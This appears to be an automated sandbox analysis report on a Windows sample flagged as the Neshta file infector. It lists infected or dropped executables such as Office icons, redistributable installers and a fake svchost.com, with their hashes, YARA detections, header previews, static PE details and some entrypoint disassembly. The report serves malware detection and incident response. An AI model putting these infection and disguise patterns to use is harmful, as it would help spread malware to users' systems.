                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.131620925268659
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJDK2sNTXC8cEGV6GskwTO:JxqjQ+P04wsmJCOKZxXk6GskwTO
                                                          MD5:1F414E9B0D1C3584418658367EC9242F
                                                          SHA1:5D11420BEB0507F3A71925E2A0A2DC36EA1265DF
                                                          SHA-256:CEB5DB2FF4B04E0C3683D039DB97ACC145C5FB9DD026A7DC9B84F12D424E9488
                                                          SHA-512:1AE9A3653B774AACEA8A2CD24ED9BAAD8245967E16122F53099A8A640D6BF5C055651C50B5D83C4EBF962060FE021A274EDBFB818093A783884C9AC6DB822D03
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4980851403396676
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCHJDYG7YSUhCD8TanIVayX0TfC8cvB11lV:sr85CpDDkSQCfLy0fk11lV
                                                          MD5:D4811ACDE0C5F48DACC1BBC3E310E8D8
                                                          SHA1:06F814E81524B40587E503E32B8865D66A8383A6
                                                          SHA-256:3B5D056392B165F9001BF785E6F91187B75A67F0209E5C189AE0764A66FF3E10
                                                          SHA-512:6BE82945EAB1E9FD9BA507045B6B45799AFD11F5A3A30949E03FA100F93750DD0ECEBECABDB1883B764C90791ABED09EE191588BB8A8241AC6A6AFAAA120C169
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.57605386644689
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCMfSoIt2ZzzV9uc1EshwMDkEcAv4i+:sr85Cnkz//1DgEcAv5+
                                                          MD5:100E15577B28178663E63AB854D28B4A
                                                          SHA1:DC7D931ECDA8C09D0D2B43988E6D689A20E080F1
                                                          SHA-256:238254BCE07446426D478897AC3DE27DE2B9606B2E8477F7DDAF8A20A2999FC4
                                                          SHA-512:5F5A2C7F553B747A9A1811E9D4D3A0BDA525D5977D5BB709F65164308E020B31A7EC0029C435D8F05E46E737242BB5F934D0094728841F6C545E15C625444C47
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):4.744720269791172
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJozp/q4:JxqjQ+P04wsmJCV/Z
                                                          MD5:316C81CA54C5FAC241D16CA25E7B341C
                                                          SHA1:9E1199BCB359EA9146EAD52E765F3913A791CD7A
                                                          SHA-256:9CE3D752106B78CBB5CF3DF574CD084177C4CF97FF35CC6E983EAD6F4A3F6CE1
                                                          SHA-512:CEC15054D8351322566F67B46B333F11064CB650D4ADDCDBC9174C66EE4E4D4F1C3400FDE6BBDCD3B632ED051C92E898C5170B1A6504BB11A771230D4EA15D3F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.422024969420582
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCjMnNFZnBeGI9cKm8q3+i2PPvfKLD1D9nwt:sr85CMBeLsOBXiN9nwt
                                                          MD5:62F99051442ED97159B8D9CC03BBF8DC
                                                          SHA1:E22CF810217DFC5700C2C629162EF37CA672C957
                                                          SHA-256:C83C04BB7EBAC75F623938C167AD7F09606F2E0B786A1CCAFA12E080F9455E9A
                                                          SHA-512:FE259BC5D8C12884C403B4F08E00272DEBFEECEDF5F9230F8B0A3B6DE100D58AEC610B849DFFD94568A44389FACAF7B55B1631F9AA51BD91B7C1F3C91408619A
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.441581793400409
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbqnf2+Q4NIvym8kig4kZ5vHDRKjwX03:JxqjQ+P04wsmJCEq+l428qjRNX4
                                                          MD5:E9116F5812E84117738237DE522B5445
                                                          SHA1:367077F61C829CCA2196A1FB3DD837DCB0933BE2
                                                          SHA-256:70ED68891E1B8B9EBEBDFAC5E78E5A2C96A494A309E6E86EDFBE1507C1AAFECD
                                                          SHA-512:B34DA2164DFE64B604B60430A32C6DE6EA99B13D4EF9B972D017977DCCCBE46327FB4BDD9F6FE580816AB277D142780057B5C632A2FDB556AC231E461DC340AB
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.485543952012
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC19QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85C1IyRF9YkjqOOOB8zAK2OoxAwMqx
                                                          MD5:5BFD09277E78C899F354E5E1144B162A
                                                          SHA1:41A9E6398CCD75ABF1B0E482A196EA27E6E3E9F1
                                                          SHA-256:043710D790F7C99AA46C0C6347CC38046AA1B097519DB5F6A257B8E9B5FF578E
                                                          SHA-512:2EC324783041FF402543E60FF1A8C3A8673AC68CF4FA1AF86D20248FF3874AEAA37DF83380612E49DE8D4FD94D58D4E0CF1888E3ED1B9369C12C60735506A20D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.562712500136307
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCzzw4jkfLZTxJtDSoieff:sr85CzEBfLzJtR
                                                          MD5:4C436BAC03F954F21B3D6192A898EDE3
                                                          SHA1:1817116645BC8D2C0FB3653694D9DEDB990D4D0A
                                                          SHA-256:2DFB8EEC68A9B0730567D2E18C9F4FDD2343238C6A2F4CA41750B229D3E3AD38
                                                          SHA-512:807A1F1D78DA195DF1D714E32C53C610FE3C0E2059BAE0C90C2A2491B48E93CA8D04BB8640CC034EF000F4846016CE4DE5EF7295FDBF72668C30645334F049D6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.515754456132426
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCYRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CYRnRCr8JUg+t95Ldu
                                                          MD5:E1BDE940ECE6F7C7F80841740A907C05
                                                          SHA1:188CE476AF1396E98E7D95EC6B3D22DADC85F9DE
                                                          SHA-256:B4EDE55B8093B7E5BB26CF08684B3670B7890591FCCFBEC83AF2F79907401239
                                                          SHA-512:EB025FB6495BC3D34BEDB05ED5120EE1097B9EE8B233A2AA3ED7806802B8DEE0C7F76D0C7A600CB0910BDD2962E4C3695B1D8D31198C85AD7F139F3EFB939979
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.562807885786494
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCKzw4jkfLZTxJtDSoieff:sr85CKEBfLzJtR
                                                          MD5:933DB9DADE1B2ADDE200F742940F61C9
                                                          SHA1:19208F6EE0F07F6BF61A9E8FA04BB6B299A2C512
                                                          SHA-256:CFA2C4E5DC5AE16C510BC789B478D13F9EC05372DBADCE8C0E78A7DCFC16A3DC
                                                          SHA-512:B98BDC38BEF6AFB8E6EF2230627290E0110875197625CCE0CC9CFD9A33954AD53F678148935442753E0E2D713DA17FDFD695E997ABFF45FBBCA22BD1F6B1C12D
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.51577139672898
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCkRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CkRnRCr8JUg+t95Ldu
                                                          MD5:60738E3D150CFDD2CD11C779ED82C473
                                                          SHA1:ED9010E56426DD75DA04F45A22C6964A06DB52C0
                                                          SHA-256:AD8620D29F365145B787B9225905089FA1205A6A67775BD36EE6FF66F9AE56EB
                                                          SHA-512:F67BBBE6A8134E6342647AA03C7B59C2AA78D224DAE82B11D5EE5FC0B15BE90C30E604411E97E2E4E6E8B28D8424A2C9B0E10A130A5F21B4FA0C6A121A667D63
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.485564517117053
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCz9QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85CzIyRF9YkjqOOOB8zAK2OoxAwMqx
                                                          MD5:6A3C227401357DD0ACEE2988511EC44C
                                                          SHA1:2CB5F9BFC06F902D3B8ADCEBDF7A6DB5E8D1815A
                                                          SHA-256:67FD35785411A8926559D94CF258C6CC40A1D2683B36CBD3E99124B43D3F4307
                                                          SHA-512:A2A3F4E5FD748BF74A6CDE8674540AD893F7F8B6FFBD896E81911805DF9E8DC3CCDB832661DA8A7A5505F74EA81863593DDF7CF4759C1028846C4461EA0D8E71
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.5964179831347325
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                          MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                          SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                          SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                          SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):73728
                                                          Entropy (8bit):5.922084559506043
                                                          Encrypted:false
                                                          SSDEEP:768:l3884wDr9n0++Bt2FBUrW0ntS7T3b1vZHP6Rxux0uPwas3OR+MxbpSF07xx:Vfy+dJ4tS7T3PS2CuPwL+Hzrxx
                                                          MD5:6CE7CC1F376F6BD9D090EAF04EF72DFE
                                                          SHA1:FB2693061F91F2C9FA4480EDAC7CAE0FA7602EC7
                                                          SHA-256:2E87815522531721634BE2EF071B1292612FC7A8A07E785645C37EAF56E0A6E9
                                                          SHA-512:3D10AA247C8953D20A00AF5D46E1E720A14967FF3306D9009C87C8C0754A5D6F924517882503E422513B54B51DE0187769FA9F7C0ABF3B3F773D5EF6243C2042
                                                          Malicious:true
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....WL.....................0......\.............@..........................0.......\..........................................(.... ......................................................................(... .......,............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.265455130586502
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCnaBqYq8A5V626j2yk+w9PajrxWfv:sr85Cnas/8OUx2ykUGv
                                                          MD5:BB762A775319A10BBC68B0EA9822F00E
                                                          SHA1:6BE26E938DCC437BDE58003D1314412C1EAB6550
                                                          SHA-256:1AC2F8C8F2D4F2257C9F762D44E760420940AE2E518DD4C5A2DD573077BB93A3
                                                          SHA-512:1C1B1E23140987DFC728CC02F57F2BB8D39E00ABEEF34D0C13B67555CAB231B35C73C3004B3EAD84936903629FF25D4D42165A26D569DD2260895E2C17E3A1FE
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Windows\svchost.com
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):6.02108194650798
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ:JxqjQ+P04wsmJC
                                                          MD5:15D8AB38054A766318C235EE74AC10E8
                                                          SHA1:836C007D0760F9BA204F73553518004C2D7A6746
                                                          SHA-256:0A856419B518368CB9945D8BFB2B05FB2763DB8A9BCA7F5280CA1A487855A4EC
                                                          SHA-512:B00B269F2F6D020D7ECF422859965691E37083E6F80701C3021F6EDB3C2C76AD0261DBF4F2B3877CF9B0604F93430E77BBD7499AD4813BDA72462253E3176397
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Windows\svchost.com, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.165280406994612
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 97.38%
                                                          • Win32 Executable Borland Delphi 6 (262906/60) 2.56%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          File name:Z68mMCAxFZ.exe
                                                          File size:115200
                                                          MD5:547612a9ff746063a74c71b009230500
                                                          SHA1:c04b0adc612addc701e3a0336a4e8a23fbd331c4
                                                          SHA256:bf99b231b81ab2ba895c0cbf395a5fdb5fc18d3465592150e365f31302c8250a
                                                          SHA512:545b74192e076e46a960a05e5281dedfd00c7fc002aeec60f04f55543eb79beaa2866ab20e16903e2d1601275e28be73fa0a5ef5abe23fd2e13c38805cdd9402
                                                          SSDEEP:1536:JxqjQ+P04wsmJCfCuPwL+Hzrxx9Yfy+dJ4tS7T3PSC:sr85C643FYPP4tkr
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                          File Icon

                                                          Icon Hash:20047c7c70f0e004

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4080e4
                                                          Entrypoint Section:CODE
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                          DLL Characteristics:
                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:9f4693fc0c511135129493f2161d1e86

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFE0h
                                                          xor eax, eax
                                                          mov dword ptr [ebp-20h], eax
                                                          mov dword ptr [ebp-18h], eax
                                                          mov dword ptr [ebp-1Ch], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov eax, 00408054h
                                                          call 00007F8CE0E225F7h
                                                          xor eax, eax
                                                          push ebp
                                                          push 00408220h
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          mov eax, 004091A8h
                                                          mov ecx, 0000000Bh
                                                          mov edx, 0000000Bh
                                                          call 00007F8CE0E25741h
                                                          mov eax, 004091B4h
                                                          mov ecx, 00000009h
                                                          mov edx, 00000009h
                                                          call 00007F8CE0E2572Dh
